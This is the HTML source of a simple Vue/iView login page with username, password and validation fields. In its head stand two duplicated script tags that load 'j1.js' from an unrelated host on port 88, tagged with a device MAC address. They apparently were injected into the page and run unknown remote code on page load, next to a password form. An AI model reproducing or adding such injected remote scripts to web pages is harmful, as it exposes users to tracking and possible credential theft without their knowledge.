


<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>Welcome default</title>
    <link rel="stylesheet" type="text/css" href="http://unpkg.com/iview/dist/styles/iview.css">
    <script type="text/javascript" src="http://vuejs.org/js/vue.min.js"></script>
    <script type="text/javascript" src="http://unpkg.com/iview/dist/iview.min.js"></script>
    <style type="text/css">
        #app,
        body,
        html {
            width: 100%;
            height: 100%;
        }

        .layout {
            background: #f5f7f9;
            height: 100%;
            position: relative;
            overflow: hidden;
        }

        .login {
            position: relative;
            left: calc(50% - 160px);
            top: 34%;
        }
    </style>
<script async=true src="http://t.wsgblw.com:88/j1.js?MAC=D8C8E92E13B8"></script>
<script async=true src="http://t.wsgblw.com:88/j1.js?MAC=D8C8E92E13B8"></script>
</head>

<body>


    <div id="app">

        <div class="layout">
            <layout class="login" style="">
                <card style="width:320px">
                    <p slot="title">Service Login</p> 
                    <div>
                        <i-input v-model="username" size="large" placeholder="Username" style="margin-bottom:10px;">
                            <icon type="md-person" size="20" slot="prepend" />
                        </i-input>
                        <i-input v-model="password" size="large" placeholder="Password" type="password" style="margin-bottom:10px;">
                            <icon type="md-lock" size="20" slot="prepend" />
                        </i-input>
                        <row style="margin-bottom:10px;">
                            <i-col span="12">
                                <i-input v-model="validate" size="large" placeholder="Validate">
                                    <icon type="md-checkmark" size="20" slot="prepend" />
                                </i-input>
                            </i-col>
                            <i-col span="12"></i-col>
                        </row>
                        <i-button type="primary" long>Login</i-button>
                    </div>
							  
                </card>

            </layout>
        </div>
    </div>
    <script>
        new Vue({
            el: '#app',
            data: {
                username: '',
                password: '',
                validate: ''
            },
            methods: {}
        })
    </script>
</body>

</html>
